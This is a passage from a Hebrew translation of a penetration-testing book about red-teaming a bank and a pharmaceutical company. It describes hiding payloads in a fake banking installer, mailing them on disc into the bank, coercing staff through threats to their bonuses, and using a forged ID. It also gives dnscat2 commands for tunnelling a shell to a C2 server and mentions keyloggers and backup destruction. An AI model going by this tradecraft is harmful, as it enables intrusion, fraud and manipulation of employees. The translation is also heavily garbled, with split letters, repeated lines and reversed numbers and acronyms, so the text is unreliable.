‫‪ Virus Total‬עו שה מזה‪ ,‬כפי שמוצג באיור ‪3.3 .‬‬
‫איור ‪ 3.3:‬ממממממ‪ .‬חֲ ׁ ָשאִי‪.‬‬

‫ע כ שיו אתה צריך לגרום ל כ ל העניין להיראותייצוגי ו לגי טימי‪ .‬בעת א ספ קת מ טענים‬
‫בצורה זו‪ ,‬אני מציע לארוז ה כ לי חד באמצעות מת קין מ קצועי כגון ‪InstallShield‬או‬
‫‪)Inno‬הא חרון הוא חינמי ו קוד פתו ח(‪ .‬מ שתמ שים סומ כיםיותר ע ל ח בי לות למראה‬
‫לגי טימי וזה מאפ שר לך להיותיצירתי עם לוגו ש ל בנ ק ו כן ה לאה‪ .‬ל ח ברהי ש ח בי לת‬
‫‪ Windows‬ל בנ קאות מ קוונת ב חינם להורדה‪ ,‬אז אני אר כו ש אותה וא ש קף את ה סגנון‬
‫ש לה כמה שאפ שר‪ .‬או סיף גם אפ לי קציית דמה שמתיימרת להיות תו כנה בנ קאית כ ל שהי‬
‫)זהי כו ל להיות כ ל ד בר שתומך באמת לה ש לך(‪ .‬איך אתה מתמודד עם זה ת לוי ל ח לו טין‬
‫בך‪ .‬אםי ש לך זמן‪ ,‬צור מ שהו מר שים; אם לא‪ ,‬אפ לי קציית שורת פ קודה שמייצרת שגיאת‬
‫ספרייה מתו כננת בעת הפע לה היא אפ שרות‪ .‬הד בר ה ח שו ב הוא שהמ טענים ש לנו‬
‫מות קנים במ קום ש בו הם לאיימצאו ו לאי בוצעו‪ ,‬בעוד שאפ לי קציית הדמה ש לנו צרי כה‬
‫להיות הד בר שמו שך את ת שומת ה ל ב‪ .‬זה צריך להת קין עם סמ ל שו ל חן ע בודה ו כו' ו לא‬
‫לעורר ח שד )מיידי(‪ .‬ל ח לופין‪ ,‬תו כ ל גם ל ש חרר את ס קריפ ט ‪PowerView PowerShell‬‬
‫כדי ל שפוך מ שתמ שים ומער כות מ‪ DA-‬כך שגם אם הגי שה ש לנו קצרה‪,‬י ש לנו מידע ר ב‬
‫לע בוד איתו ע בור הת קפות עתידיות‪ ,‬הן ט כניות והן ח ברתיות‪.‬‬
‫ש ל ב ‪III:‬אריזה פיזית‬
‫שו ב‪ ,‬המ טרה היא להיראות לגי טימי כ כ ל האפ שר‪ .‬אם אתה פור ס את ה ח בי לה ש לנו ע ל‬
‫די ס ק אופ טי‪ ,‬ה שתמ ש במדפ סת תוויות ו באמת הפוך אותה למ קצועית‪ .‬במ קרה זה‪,‬‬
‫אפרו ס איתו ת לו ש דואר שמ קורו ב בנ ק המדו בר עם פת ק כתו ב מהיר כדי לתמוך‬
‫בתואנה‪.‬‬
‫ה טרי ק ה בא הוא לה כני ס את ה ח בי לה לדואר הפנימי ש ל ה בנ ק‪ .‬זה ק ליותר‬
‫ה טרי ק ה בא הוא לה כני ס את ה ח בי לה לדואר הפנימי ש ל ה בנ ק‪ .‬זה ק ליותר ממה שזה‬

‫נ שמע‪ .‬כ שע בדתי בע בר ב בנ ק הזה והמתינו בד לפ ק ה ק ב לה‪ ,‬הייתי רואה לעתים‬
‫קרו בות עו בדים מע בירים ח בי לות לד לפ ק ה ק ב לה למ ש לו ח פנימי ) בעצם פ שו ט זור קים‬
‫את זה ל קופ סה(‪ .‬כ ל עוד ה כ ל נראה לגי טימי )עם חו קי ה בנייה הנ כונים ו כו'( זה כ ל כך‬
‫פ שו ט ו ל כן מ ח קר מפור ט הוא קרי טי‪ .‬במ קרה זה‪ ,‬לרוץ מהר חו ב ו לנת ק את ה קו עו בד‬
‫מצוין ‪-‬אתה ח שו ב וע סו ק א חרי ה כ ל‪ .‬א ל תעמוד בתור; אםי ש לך זמן לעמוד בתור‪,‬י ש‬
‫לך זמן לע שות את זה בעצמך‪.‬‬
‫העי להי כו לה להיות כ ל מה שתרצה כ ל עוד היא נראית ר שמית‪ ,‬נראית כאי לו מגיעה‬
‫ממ קור ר שמי ונראית חו בה‪ .‬המון ד ברים הם חו בה ב ס בי בה ארגונית )הדר כות תאימות‬
‫הן דוגמה טו בה(‪ ,‬א ב ל ח ש בו למה זהיגיע למדיה פיזית ‪-‬האם זה סודי מדי ל ש לו ח‬
‫בדוא" ל? האם העו בד נ ב חר מתוך ר שימה קצרה מ כ ל סי בה שהיא ‪-‬האם הוא אמור‬
‫להרגי ש ז כות ל ק ב ל את זה? האם ה ש למה חיונית כדי ל ק ב ל את ה בונו ס ש להם? איים‬
‫ע ל בונו סים ש ל אנ שים ואתהי כו ל לגרום להם לע שות ה כ ל‪.‬‬
‫ההת קפה‬
‫י ש לך את ה‪ 2C-‬המ שודרג ו ח בי לה פיזית פרו סה למ ספר מר כזים ש ל בנ ק הפונה ליעדים‬
‫תוך שימו ש ב קודי ה בנייה הנ כונים‪ ,‬המו ס כמות ומינו ח א חר‪ .‬זו פיגוע מתו כנן הי ט ב‬
‫ומי שהוינ שך‪ .‬בינתיים‪ ,‬מה ע ליך לת קוף כא שר אתה מ ק ב ל גי שה? מער כות ת ש לום‬
‫נראות כמו ת שו בה ברורה‪ ,‬א ב ל הי כו לת ל ק ב ל גי שה למער כות הת ש לומים והי כו לת‬
‫ל שים את היד ע ל ה כ סף הם שני ד ברים שונים מאוד‪ .‬תו קף ע לו ל ל ברו ח מזה פעם א חת‪,‬‬
‫א ב ל כ ל ס כום כ סף שיהפוך סי כון כזה ל קייםיגרום ל בי קורת ו ל ב ט חי ביא להפע לת‬
‫העי קרון שנ קרא שתי‪-‬ה קי שות ש בו ק בוצת עיניים א חרת תצ טרך לא שר הע ברת כ ספים‪.‬‬
‫תצ טרך להיות ב טו ח מאוד בה בנתך את המער כות המדו ברות‪ ,‬התפ שרת ע ל מ ספר‬
‫מ שתמ שים‪ ,‬ו להיות מ סוג ל ל ש לו ט בזרימת המידע במידה מ סוימת‪ .‬המפת חות לממ ל כה‬
‫הם לא מער כות הת ש לום‪ ,‬א לא מנגנוני ב קרת ה שינוי‪.‬‬
‫ב קרת שינויים היא הגי שה ה שי טתית לרי שום‪/‬אי שור כ ל שינוי במוצר ספציפי‪ ,‬ער כת‬
‫חו קים ש ל חומת א ש‪ ,‬שדרוג תו כנה או כ ל ד בר א חר‪ .‬זה ח ל גם ע ל ב קרת גי שה פיזית‪.‬‬
‫ל בנ ק בינ לאומיי ש הר בה מאוד ט כנו לוגיות שונות והוא ת לוי במי קור חוץ ע בור ח ל ק גדו ל‬
‫מהע ס קים ה שו טפים ש לו‪ .‬ב קרת שינויים ת שמ ש כדי לה ח לי ט למי תהיה גי שה למה‬
‫ומתי‪ .‬לדוגמה‪ ,‬הת ב ק שה בי קורת נ קודות תורפה ע ל מתג בנ קאי לי בה שידרו ש גי שה‬
‫פיזית לאו לם ה שרתים כדי ל בדו ק‪.‬‬
‫מי שהויצ טרך ל חתום ע ל זה ו לומר למע שה‪ " ,‬לאדם הזהי ש א‬
‫מי שהויצ טרך ל חתום ע ל זה ו לומר למע שה‪ " ,‬לאדם הזהי ש צורך ע ס קי להעני ק לו גי שה‬
‫לאתר ‪ ABC‬בתארי כים א לה והואיזד ק ק בנו סף לגי שה לאו לם ה שרתים "‪XYZ.‬זהיי כנ ס‬
‫ל ב קרת שינוי כדי לא שר או לה כ חי ש‪.‬‬
‫אםיאו שר‪ ,‬כא שר המ ב קריופיע באתר‪ ,‬הא ב ט חה ת בדו ק את תעודת הזהות ש לו ותיתן‬
‫לו כר טי ס כני סה זמני‪ .‬אם הוא צריך גי שה לאו למות ה שרתים אז ברגע שהוא נ כנ ס‬
‫למת חם הא ב ט חה‪ ,‬הוא מו סר את תג הזמני ש לו ע בור כר טי ס כני סה לאו לם ש לאיאפ שר‬
‫למ שתמ ש לצאת מה בניין‪ .‬אז הואיצ טרך לה ח ליף אותו ב חזרה כ שהואיעזו ב‪ .‬בדרך זו‬
‫מע בר האו לם לאי כו ל לצאת מה בניין‪ .‬כ ל זה נ שמע מאוד ב טו ח‪ .‬ה בעיה הי חידה היא‬
‫ש ב קרת שינויים היא בעי קר שימו שית ר ק לרי שום שינויים‪ ,‬כך שאם מ שהו נ ש בר‪,‬י ש ש בי ל‬
‫בי קורת כדי להראות בדיו ק מה קרה ומה צריך ל חזור א חורה‪.‬‬
‫בפוע ל‪ ,‬א לא אם כן שינוי מ סוים הוא חריג‪ ,‬זהו תה ליך חותמת גומי‪ ,‬במיו חד ע בור ב קרת‬
‫גי שה פיזית‪ .‬כ ל כך הר בה אנ שים באים והו ל כים כ ליום שזה לאי כו ל להיות שום ד בר‬
‫א חר‪ .‬באופן ע קרוני‪-CISO ,‬הצריך לא שר ב ק שה ליועץ א ב ט חה להי כנ ס לאו למות‬
‫ה שרתים‪ ,‬א ב ל זה מי שהו ממ ש ברא ש ה סו לם ש לאיידע אי לו בדי קותיומיומיות מת בצעות‬
‫או שמות ש ל כ ליועץ שנ כנ ס לת חום ש לה‪ .‬אם רא ש צוותיגי ש ב ק שה כזו ב ב קרת שינויים‬
‫היא תאו שר‪ .‬באופן כ ל לי‪ ,‬זה נראה כך‪:‬‬
‫מי צריך גי שה? רו ב הא קרמן מ שירותי הא ב ט חה הא קרמן‪.‬‬

‫ב ש בי ל מה הם צרי כים גי שה? בי קורת פגיעות ש ל ס בי בת ‪XYZ.‬‬
‫איזו גי שה נדר שת? גי שה ל בניין באתר ‪MZ.‬גי שה לאו לם ‪ -ABC.‬ל‬
‫האם הם נ בד קו ע לידי הא ב ט חה בע בר? כן‪.‬יועץ נו כ ח לעתים קרו בות ב‪-HJ. ZM-‬ו‬
‫זהיהיה נ חמד אם תו כ ל ל ק ב ל גי שה לאתר פיזי ו ל ח בר את המ ח ש ב הנייד ש לך ו לה סת כ ל‬

‫מ ס בי ב‪ ,‬א ב ל האם זה לאיהיה נהדר אם תו כ ל ל ק ב ל גי שה לאו למות ה שרתים? פ שו ט אי‬
‫אפ שר להמעי ט בנז ק שתו קףי כו ל לע שות בנ סי בות כא לה‪ .‬תה ליך ב קרת ה שינוי מתר ח ש‬
‫פעמים ר בות ביום וניתן לג שת למער כת ר ק מתוך האינ טרנ ט הארגוני ש ל ה בנ ק )או‬
‫באמצעות ‪ VPN),‬כך שאין סי בה מיו חדת ל ח שוד ש ק ב לן צריך גי שה למ שא בים כדי ל בצע‬
‫את ע בודתו‪ .‬נו כ ל לה כני ס כ ל שם למער כת שנרצה כ ל עודי ש לנו תעודת זהות לגי בוי‪,‬‬
‫א ב ל זה לא חיי ב להיות דר כון או כ ל ד בר ש ק שה לזייף‪ .‬פעם ה שתמ שתי ברי שיון נהיגה‬
‫מזויף ש ל מרי לנד כדי להי כנ ס ל בניין )מ חוץ לארצות ה ברית‪ ,‬אז שום חו קים לא ע ברו(‪.‬‬
‫זה לא היה שו ל ל שו טר במרי לנד‪ ,‬א ב ל ה ח בר'ה הא לה מעו לם לא ראו א חד לפני כן וראו‬
‫אף א חד לא ח כםיותר‪.‬‬
‫כ שההת קפה תע לה לאוויר‪dnscat2 ,‬י חזור ל‪ 2C-‬ש לנו ויאפ שר לנו לע בור במנהרה לתוך‬
‫מ טען ה‪ HSS-‬ש לנו‪ .‬ממ ש ק המ שתמ ש ש ל ‪ dnscat2‬מור כ ב מ ח לונות‪ .‬ח לון ברירת המ חד ל‬
‫נ קרא ה ח לון "רא שי"‪ .‬אתהי כו ל ל ק ב ל ר שימה ש ל ח לונות ע לידי ה ק לדה‬
‫> ח לונות‬
‫א ֹו‬
‫> מפג שים‬
‫בהנ חיית ‪ dnscat2 .‬ברגע שי ש לךיעד חי‪ ,‬זהיני ב את הד ברים ה באים‪:‬‬

‫‪ 0 ::‬רא שי ]פעי ל[ ‪ dns1 ::‬מנה ל הת קן ‪ DNS‬פוע ל בדומיינים = ‪0.0.0.0:53‬אנ טי וירו ס‬
‫]*[ ‪update.com‬‬
‫כדי ליצור את המנהרה ש לנו‪ ,‬ה שתמ ש בזה‪:‬‬
‫האזינו ‪[0000:]443 localhost:443‬‬
‫היא תיצור מנהרה ביציאה ‪ 443‬ש ל שרת ‪ C2‬ות סתיים ב‪ 344-‬במ ח ש ב שנפרץ ש לנו‬
‫) בהנ חה ש כאן כמו בן ש‪ HSS-‬מאזין ב‪.(344-‬‬
‫כעתי ש לך גי שת מע טפת מאו ב ט חת למאר ח היעד ואתהי כו ל ל בצע פ קודות ו להע ביר‬
‫ק בצים‪ ,‬ה כ ל באמצעות ב ק שות ותגו בות ‪ DNS‬ע קיפות‪ .‬כ ליי שומי אינ טרנ ט שמ סוג לים לע שות‬
‫זאת בר שת היעד ) כו ל ל ב קרת שינויים(י שתמ שו ב‪ DA-‬כדי ל טפ ל באימות‪ .‬כ לומר‪ ,‬הגי שה‬
‫תי ק בע באמצעות ר שימת ב קרה מר כזית המ קו שרת ל ח ש בון הדומיין ש ל המ שתמ ש ו לא‬
‫מתוך הת ח ברות‪ /‬סי סמה ספציפית לאפ לי קציה‪ .‬זה מעניין מ כיוון ש ב ש ל ב זה אתהי כו ל‬
‫לפרו ס ‪ Keylogger‬כדי לתפו ס את האי שורים ש ל היעד או לה חדיר את הת קפת ‪-Proxy‬ה‬
‫ש ל ‪IE‬י שירות לדפדפן האינ טרנ ט כמו בפר ק ‪ 1.‬ל שתי הגי שותי ש את היתרונות ש להן‪ ,‬אם כי‬
‫הרא שונה תדרו ש ה ס למה ש ל הר שאות כדי להצ לי ח כמו גם הר בהיותר זמן‪ .‬זה בדרך כ ל ל‬
‫לא בעיה‪ ,‬א ב ל אנ חנו דנים בתה ליך הזה לעומ ק בפר ק ה בא במעור בות ארו כת טוו ח‪.‬‬
‫כ ל מה שאתה צריך לדעת ע כ שיו זה את ה שם ש ל שרת ב קרת ה שינוי ש שו ב אתהי כו ל‬

‫להפי ק מ‪ .DA-‬עם גי שה למער כת ב קרת ה שינויים תו כ לו להעני ק לעצמ כם גי שה כיועץ או‬
‫ק ב לן ל כ ל מת קן ב בנ ק‪.‬‬
‫די ברתי קודם ע ל ‪-SOC‬ה וזו אנ קדו טה ש שווה ל חזור ע ליה‪ .‬סעיף זה מתאר פיגוע ש ביצעתי‬
‫ב‪ .2102-‬אף א חד לא ח קר אותי )או‬
‫ה סעיף מתאר מת קפה ש ביצעתי ב‪ .2102-‬אף א חד לא ח קר אותי )או באמת הודה בי(‬
‫עד ש סיימתי את הי ב ט או לם ה שרת ש ל ההת ק שרות )צי למתי כמה תמונות ש ל ר כזות‬
‫ניתו ב לי בה( וה ח ל טתי לע לות למע לה כדי להת ח בר ל‪ LAN -‬כדי ל ק ב ל כמה צי לומי מ סך‪.‬‬
‫פנו א ליי מא ב ט חה ט כנית ) ש שמה ל ב ש כתו בת ה‪ CAM-‬במ ח ש ב הנייד ש לי לא ר שומה(‪.‬‬
‫מ ב לי להציג את עצמם‪ ,‬הם ר ק שא לו‪" ,‬אתה עו שה מ ב חן ע ט?"‬

‫" כן‪ ",‬עניתי‪.‬‬
‫"מצוין‪ ,‬תן לי פ שו ט ל ק ב ל את ה‪ CAM-‬ש לך כדי ש לא נ ק ב ל התראות נו ספות‪".‬‬
‫הרג שתי שזה די ה בי ס את הנ קודה ש ל ‪-SOC,‬הא ב ל זו שאננות ‪-‬א חד האוי בים הגדו לים‬
‫ש ל ה בי ט חון שי ש‪.‬‬
‫סי כום‬
‫‪-CISO‬ה קי ב ל את המצגת המפ חידה ש לו ואת הגד לת הת קצי ב שהוא רצה‪ ,‬א ב ל ב טוו ח‬
‫הארוך לא ס ביר שהתרגי ל הגדי ל באופן דרמ טי את עמדת הא ב ט חה ש ל הארגון‪ .‬אתה‬
‫י כו ל לתעדף א ב ט חה‪ ,‬אתהי כו ל לזרו ק ע ל זה ש ל ל כ סף‪ ,‬א ב ל ה שורה הת חתונה היא‬
‫שאתה עדיין צריך להיות מ סוג ל לע שות ע ס קים‪ .‬אם אתה צריך שאנ שיםי כנ סו ל בניינים‬
‫ש לך ויע שו ע בודה ע ל ב סי ס ק בוע‪ ,‬צרי כה להיות דרך זורמת כדי לאפ שר לזה ל קרות‪,‬‬
‫שמת ח ש בת גם בה ש ל כות ה בי ט חוניות‪ .‬במ קרה זה‪ ,‬זה נ כ ש ל‪.‬‬
‫הה ש ל כה כאן היא שהמער כות ה ברורות לת קוף אינן בה כר ח הנ כונות‪ .‬כפי שצוין לעי ל‪,‬‬
‫כ בוד קי ע טים נו כ ל כנראה לערער את מער כות הת ש לום עצמן‪ ,‬א ב ליהיה ק שה לע בור‬
‫מ שם להוצאת כ סף פיזית מה בנ ק )הדגמה מר שימה כ כ ל שתהיה(‪ .‬במ קרה זה‪ ,‬ב חרנו‬
‫לפגוע במער כות ב קרת ה שינויים מ כיוון שהן היו פגיעותיותר ויאפ שרו לתו קף הר בהיותר‬
‫גמי שות ב ש לי טה ו בעיצו ב ה ס בי בה כראות עיניו‪ .‬מי ליונים הוצאו בא ב ט חת אפ לי קציות‬
‫אייפון ואתרי בנ קאות קמעונאית‪ .‬שום ד בר לא הו ש קע ב בדי קת מער כות ב קרת ה שינויים‪.‬‬
‫‪1.‬ה כירו את המוצר ‪AlienVault USM.‬ה בנה ש ל מה שה ב חור ה שני רואה ת שנה את‬
‫זרימת הע בודה ש לך ל טו בה‪.‬‬
‫‪ 2.‬ח קור את ‪ dnscat2‬ומ ק בי לותיו‪ .‬בדו ק את התע בורה באמצעות ‪Wireshark.‬‬
‫איךי כו לת להפוך את התנועה ל חמ קניתיותר?‬
‫‪3.‬אי לו אמצעים תו כ ל לנ קו ט כדי לצמצם את מת קפת מנהור ?‪-DNS‬האפ שרות‬

‫א חת היא להפריד ‪ DNS‬פנימי ו חיצוני‪ ,‬א ב ל זה לא ס ביר שיהיה מע שי ב ח ברה גדו לה‪.‬‬
‫מה עוד אפ שר לע שות?‬
‫פר ק ‪4‬‬
‫פארמה קארמה‬
‫במה לך ‪ 2011,‬מפגיני " כ בו ש את וו ל ס טרי ט" חנו בגנים צי בוריים בר ח בי ארצות‬
‫ה ברית‪ .‬הם כע סו ע ל מ שהו‪.‬‬
‫הם לא היו ב טו חים מה‪.‬‬
‫המ סרים ש להם היו לא קוהרנ טיים‪ .‬הם רצו שהממ ש לה תת קן ד ברים‪.‬‬
‫הם רצו שהממ ש לה תפ סי ק את חמדנות ה ח ברות‪ .‬א ב ל למרות כ ל האידיא ליזם שמא חורי‬
‫התנועה‪ ,‬המפגינים ה חמיצו נ קודה ב סי סית א חת ח שו בה‪ :‬תאגידים ) כמו מדינות לאום(‬
‫בר חו מהי קף אנו שי‪ .‬אין "אדם" להי ל חם בו‪ ,‬ר קי שות ר ח בתידיים שמ טרותיה הן הנצ חה‬
‫והתר ח בות‪.‬‬
‫מה זה ק שור לא ב ט חת מידע? ה כ ל‪ .‬עד ש לא ע בדת ע בור תאגיד ענ ק‪ ,‬ק שה לה בין באמת‬
‫איך הם מתפ קדים; קו ל ק טי ב ש לי חידות ע ס קיות ק שורות המ חו ברותי חדיו בתה ליך‬
‫ב לתי מתפ שר‪ .‬מנ כ" ל הוא דמות דמות‪ ,‬לאיותר ‪ -‬מי שהו שי שים פנים למוצר חד ש‬
‫במ קרה ש ל אפ ל או מי שהו שאתה צריך ל חפ ש כדי לדעת את שמו במ קרה ש ל ‪Verizon‬‬
‫או מי שזה לאיהיה‪.‬‬
‫ח ברות התרופות אינן זרות למ חות ו‪ 1102-‬לא הייתהיוצאת דופן‪ .‬ק בוצות שמ בצעות‬
‫כ לונ סאות נו בר טי ס או פייזר הן כ ל כך נפוצות עד שאינן שוות אז כור‪ .‬כמו בן‪ ,‬ה בעת‬
‫התנגדותך למדיניות התאגיד ) במ קרה זה ני סויים ב בע לי חיים( באמצעות הנפת באנר‬
‫אינהיעי לה במ קרה ה טו ב בדיו ק בג ל ל ה סי בות ה ל לו‪.‬יום א חד‪ ,‬א חת מה ק בוצות ה ל לו‬
‫ת למד כי שורי חדירת מער כת ב סי סיים והם ע שויים לה שיג מ שהו‪.‬‬
‫מייודע?‬
‫כ שה שתתפתי בפגי שת ההי קפים כדי לדון במעור בות בדוגמנות ‪ APT‬עם פארמה גדו לה‪,‬‬
‫גי ליתי את התופעה המדהימה ש כ כ ל הנראה אי ש בניו ג'רזי לא הו לך ל שום מ קום‪.‬‬
‫ה ח ל טתי להי שאר בהו לידיי אין מע בר ל כ בי ש מה ח ברה כדי שאו כ ל פ שו ט ל קפוץ מהמי טה‬
‫ו לא להתע ס ק עם מוניות או ר כ בים ש כורים‪ .‬תארו לעצמ כם את ההפתעה ש לי כ שמצאתי‬
‫את עצמי מ בי טה ב קצה הע ס ק ש ל מ ק ל לי לה גדו ל שה חזי ק מא ב ט ח מא סי בי דומה‪.‬‬
‫ה ס ברתי שהייתי שם לפגי שה ע ס קית בזמן שהוא די בר בעצ בנות לתוך מ כ שיר ה ק שר‬
‫ש לו‪" ,‬אני לאיודע‪ ,‬הוא פ שו ט נ כנ ס ל כאן‪ ".‬ה כ ל ה סתדר‪ ,‬א ב ל לפגי שה ש למ חרת‪ ,‬ל ק חתי‬
‫במ קום הה סעה ש ל המ לון‪ ,‬שנופפה ל לא מ ב ט שני‪ .‬לא חר מ כן ל ק חתי את המע בורת‬
‫הפנימית ל בניין ‪-IT‬ה ו‬
‫ה כתף ג ל שה דר כי פנימה‪ .‬ה כ ל ב לי כר טי ס‪ .‬אני מאמין שהאירוניה ש ל זה לא א בדה‬

‫לך‪.‬‬
‫בפר ק זהי ש אז כור מעורפ ל ש ל ט כנו לוגיה הנ קראת ‪Hard Disk Firewall,‬אך אינו‬
‫מתיי ח ס א ליה ב שמה‪ .‬ה סי בה ל כך היא לא לה כפיף את המפר סם ש לי לא חריות‬
‫מ שפ טית‪ .‬עם זאת‪ ,‬ה ט כנו לוגיה מתוארת בפירו ט ר ב באתר האינ טרנ ט ש לי ב כתו בת‬
‫‪www.wilallsopp.com‬אם תרצה מידע נו סף‪.‬‬
‫פעי לי ז כויות בע לי חיים ו ק בוצות ק שורות ה קימו קמפיין אינ טרנ טיותר ויותר ממו קד נגד‬
‫המ טרות ש להם‪ .‬בע בר‪ ,‬ט ק טי קות א לו הוג ב לו במידה ר בה לה טרדות ואיומים באימיי ל‪,‬‬
‫אך הת קפות ממו קדות מתוך כוונה ל ס כן מ שתמ שים הפ כו נפוצותיותר ויותר‬
‫מתו ח כמות‪ .‬תר חי ש ה סיו ט בארגון איתו די ברתי היה הת קפות פיזיות נגד הצוות ש להם‬
‫והת קפות ש לי שוניות נגד ה ספ קים ש להם )וה ספ קים ש ל ה ספ קים ש להם ו כו'(‪ .‬גי שה כזו‬
‫הייתהיעי לה מאוד בע בר ב ברי טניה‪ ,‬והו בי לה ל כך שממ ש לת ברי טניה התער בה כ ל כ לית‬
‫במ ספר מ קרים כדי למנוע ממת קני תרופות לצאת מע ס ק‪ .‬מפגינים אמרי קאים למדו‬
‫את ה ל ק חים ה ל לו הי ט ב ומוד ל המ חאה ש ל ‪)SHAC‬הנ קרא ע ל שם ארגון ז כויות בע לי‬
‫ה חיים שהיה ח לוץ בו( הפך פופו לרי בארצות ה ברית‪.‬‬
‫שמירה ע ל א ב ט חת פר טי העו בדים ופר טי ה ל קו ח או ה ספ ק ו בו בזמן זמינה לאותן‬

‫מ ח ל קות שז קו קות למידע כזה כדי לתפ קד הייתה אתגר מ כיוון שגורמים חיצוניים היו‬
‫ר ק ח ל ק א חד מה בעיה‪ .‬בע בר נא לץ הארגון להתמודד עם הד לפות גם ש ל עו בדים‬
‫אוהדים‪ .‬לא חר מ כן‪ ,‬נ ק בע כיי ש לנ סות צורה כ ל שהי ש ל תר חי ש מוד לים ש ל ‪ APT‬ע ל‬
‫מנת להמ חי ש את ה סי כונים הנתפ סים ו ל למוד כיצד להפ חית אותם בצורה ה טו בה‬
‫ביותר‪.‬‬
‫מתוך מ ח ש בה ע ל כך ומתוך עין ל ח ס כון ב כ סף‪ ,‬ההת ק שרות כו לה תתנה ל באופן פנימי‬
‫מתוך הנ חה שתו קף ה שיג גי שה בדרך כ ל שהי או שהתו קף לא היה ש ח קן חיצוני א לא‬
‫עו בד בע ל גי שה לגי טימית לר שת הארגונית‪ . .‬ה ח ברה גם נתנה אמון ר ב ב ט כנו לוגיית‬
‫חומת א שי קרה ש ל די ס ק ק שי ח שהם פר סו לא חרונה‪ ,‬תו כנה ש ל טענתה מ סוג לת‬
‫לעצור את " כ ל ההת קפות‪ ,‬הןידועות והן לאידועות"‪ .‬כפי שתראו‪ ,‬האמונה הזו תת ברר‬
‫כ לא מ קומה לה חריד‪.‬‬
‫הי קף ההת ק שרותיהיה תרגי ל ל טוו ח קצר ש ל צייד‪-‬רוצ ח עם המ טרות ה באות‪:‬‬

‫את המ טרות ה באות‪:‬‬

‫הדמיית הת קפה נגד עו בדי ה ח ברה ע לידי אי סוף מידע כו ל ל נתונים סודיים כגון‬
‫כתו בות בית ומ ספרי תעודת זהות‪.‬‬
‫הדמיית הת קפה ש לי שונית ע לידי ר כי שת שמות ופר טים ש ל ספ קים ו ל קו חות‪.‬‬
‫ק בע תר חי ש ש בו תו קף ע לו ל לגרום לנז ק ב לתי הפיך או לפ חות קרי טי ל ח ברה‬

‫באמצעות הת קפה ע ל מ שא בי מ ח ש ב ומער כות מידע‪.‬‬
‫זהיצר תו כנית פ שו טה‪ ,‬לפ חות ע ל הנייר‪ .‬ס ביר להני ח שנצ טרך ל ק ב ל גי שה למער כות‬
‫מ שא בי אנו ש ל כ ל הפ חות‪ ,‬א ב ל עדיףיהיה אם תו כ ל לה ס לים את ההר שאות ע ל פני‬
‫כמה שיותר מהר שת‪ ,‬כו ל ל מער כות גי בוי‪ .‬כך תו כ ל לדמות אירוע הר סני עצום‪ .‬ברגע‬
‫שתו קף ה שיג גי שה למ שא בים מ שמעותיים‪ ,‬הדרך המהירה ביותר להפוך אותם ל ב לתי‬
‫שמי שים תהיה להצפין את הא ח סון ה ק שי ח ו ל ב ט ל אתי כו לת הגי בויים‪ .‬בהת קפה‬
‫אמיתית‪ ,‬ש ח קן חיצוניי שנה את הפרמ טרים ש ל הגי בויים כדי לה ח ליף את הגי בויים‬
‫בא שפה‪ .‬ק ל טות גי בוי ) כן‪ ,‬הם עדיין ב שימו ש בהר בה מ קומות א ב ל זה עו בד גם ע בור‬
‫ט כנו לוגיות מ ק בי לות(‪ ,‬למ ש ל‪ ,‬בדרך כ ל ל נע שה שימו ש חוזר כ ל ש בועיים‪ .‬כא שר כ ל‬
‫הנתונים מו שמדים‪ ,‬הת קפה ע ל הת שתית תהיה סופנית‪.‬‬
‫א ספ קת מ טען ח ל ק ‪IV:‬ניצו ל בצד ה ל קו ח ‪1‬‬

‫בפר ק זה‪ ,‬אנו מ סת כ לים ע ל א ספ קת עומ סים ע לידי ניצו ל פגיעויות בתו כנות בצד‬
‫ה ל קו ח‪ ,‬כגון דפדפני אינ טרנ ט‪ ,‬התו ספים ש להם ו קוד שו ל חן ע בודה א חר‪.‬‬
‫נ קודות תורפה חד שות מתג לות ומתו קנות ביי שומים מדייום‪ ,‬ו כתוצאה מ כך‪ ,‬אין טעם‬
‫ל למוד לת קוף באגים ספציפיים כאן‪ ,‬ש כן א להי טופ לו זמן ר ב לפני שה ספר הזהייצא‬
‫לדפו ס‪ .‬עם זאת‪,‬י ש את "ה ח שודים הרגי לים" ‪ -‬ט כנו לוגיות ש בהן התג לו באגים רציניים‬
‫ע ל ב סי ס ש בועי ל כאורה במה לך חייהם הארו כים ו כ כא לה הן להמ ח שה ומעניין ל ח קור‪.‬‬
‫ה ק ל לה שהיא פ לא ש‬
‫הע בריין הגרוע ביותר הוא ‪Adobe Flash.‬הנו כ חות ה כמע ט אוני בר ס לית ש לו ב שי לו ב‬
‫עם הי ס טוריה ארו כה ש ל א ב ט חה איומה מ שמעה שהוא מהווה מר כי ב עי קרי ש ל‬
‫ער כות ניצו ל‪ ,‬תו כנות כופר והורדות מונעות‪ .‬אין דרך מאו ב ט חת לפרו ס את סיפור‬
‫האימה הזה ש ל תו סף ‪-‬ה ש בת או ה סר אותו‪ .‬ברו ב המו ח ל ט ש ל המער כותיהיה פ לא ש‪,‬‬
‫ו ח שו ב שיהיו כמהיתרונות ע בורו בהי שגיד‪.‬י ש כ ל כך הר בה עד כוני א ב ט חה ‪Flash‬‬
‫‪ -Adobe‬ל שרו ב המ שתמ שים )ארגוניים או א חרים( פ שו ט לא טור חים )א לא אם כןי שנה‬
‫מדיניות ט כנית ארגונית לע שות זאת באופן או טומ טי‪ ,‬ו במ קרה זה ס ביר להני ח ש ס בי בה‬
‫מודעת א ב ט חה כזו סימנה זאת כ ט כנו לוגיה א סורה ב כ ל מ קרה(‪ .‬אנ טי וירו ס טו ב‬
‫ב ח סימת ניצו ל ‪-Flash‬ההגנרי שמופיע ב כ לים כמו ‪Metasploit,‬א ב ל כמו ב כ ל תו כנה‬
‫זדונית‪ ,‬כמה שינויים ק טניםי כו לים לה ב טי ח שהת קפה ת חמו ק מההגנות תוך שמירה‬
‫ע ל אפ ק טי ביות‪ .‬איורים ‪ 4.1‬ו ‪-4.2‬צרי כים ל ספ ק חומר למ ח ש בה‪.‬‬
‫איור ‪4.1:‬תמונה זו ‪-cvedetails‬מ מציגה ‪ 56‬פגיעויות ש ל ביצוע קוד ‪ -Flash‬ב ב שנת‬

‫‪ 2016‬ב ל בד‪.‬‬
‫איור ‪4.2:‬ה בעיה מ ספר א חת במ סך האזע קה הזה ש ל ‪AlienVault SOC‬היא‬

‫תו כנה פגיעה‪ ,‬כא שר התו כנה הזו היא ‪Flash.‬‬
‫לפ חות אתהי כו ל ל חיות ב לעדיו‬

‫האי כות הגאו לה ש ל פ לא ש מנ קודת מ ב ט א ב ט חה היא שהוא לא באמת עו שה שום‬
‫ד בר מועי ל ) לפ חות שום ד בר ש לא מוג ש כעת ע לידי ‪HTML5),‬אז‬
